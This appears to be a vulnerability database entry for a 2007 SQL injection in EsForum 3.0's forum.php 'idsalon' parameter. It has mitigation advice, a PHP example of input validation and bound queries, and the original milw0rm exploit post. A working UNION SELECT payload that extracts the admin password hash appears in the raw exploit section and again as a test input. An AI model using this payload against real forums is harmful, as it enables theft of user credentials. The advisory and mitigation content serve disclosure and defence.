Vendor: EsForum
By: Unknown
CVSS: 7.5 HIGH
Vulnerability Type: SQL Injection
CWE: 89
Product Name: EsForum
Affected Version From: EsForum 3.0
Affected Version To: EsForum 3.0
Patch Exists: NO
Related CWE: CVE-2007-2438
CPE: a:esforum:esforum:3.0
Other Scripts:
Platforms Tested:
2007

EsForum 3.0 SQL Injection Vulnerability

The vulnerability allows an attacker to inject arbitrary SQL code through the 'idsalon' parameter of the 'forum.php' page, leading to unauthorized access to the database and potentially compromising user information. The published exploit uses a UNION SELECT to retrieve the hashed password ('user_password') from the 'esforum_users' table for the row where 'user_id' is 1.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks.
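
One way to apply this mitigation to the 'idsalon' parameter, as an added example that is not EsForum's own code: the value is validated as a positive integer and then bound as a query parameter instead of being concatenated into the SQL text. The PDO/SQLite setup, the esforum_topics table and the function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Strict allow-list validation: idsalon must be a positive integer and nothing else.
function parseIdSalon(string $raw): int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('idsalon must be a positive integer');
    }
    return $id;
}

// The value is bound as an integer parameter and never becomes part of the SQL text.
// Table esforum_topics and its columns are hypothetical, not taken from EsForum.
function fetchTopics(PDO $pdo, string $rawIdSalon): array
{
    $stmt = $pdo->prepare('SELECT id, title FROM esforum_topics WHERE idsalon = :idsalon');
    $stmt->bindValue(':idsalon', parseIdSalon($rawIdSalon), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory data so the example runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE esforum_topics (id INTEGER PRIMARY KEY, idsalon INTEGER, title TEXT)');
$pdo->exec("INSERT INTO esforum_topics (idsalon, title) VALUES (1, 'Welcome'), (2, 'Off topic')");

$inputs = [
    '1',
    // The idsalon value from the page's exploit string, URL-decoded.
    "'/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users where user_id=1/*",
];

foreach ($inputs as $raw) {
    try {
        $rows = fetchTopics($pdo, $raw);
        printf("accepted %s -> %d row(s)\n", var_export($raw, true), count($rows));
    } catch (InvalidArgumentException $e) {
        printf("rejected %s: %s\n", var_export($raw, true), $e->getMessage());
    }
}
```

On a MySQL-backed deployment, setting PDO::ATTR_EMULATE_PREPARES to false makes the server perform the parameter binding rather than the client library.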

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...


Script: EsForum 3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
*/  MEFISTO Begins. */

-------------------------------------------------------------------------------------------------------------------
Exploit:

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

-------------------------------------------------------------------------------------------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-04-26]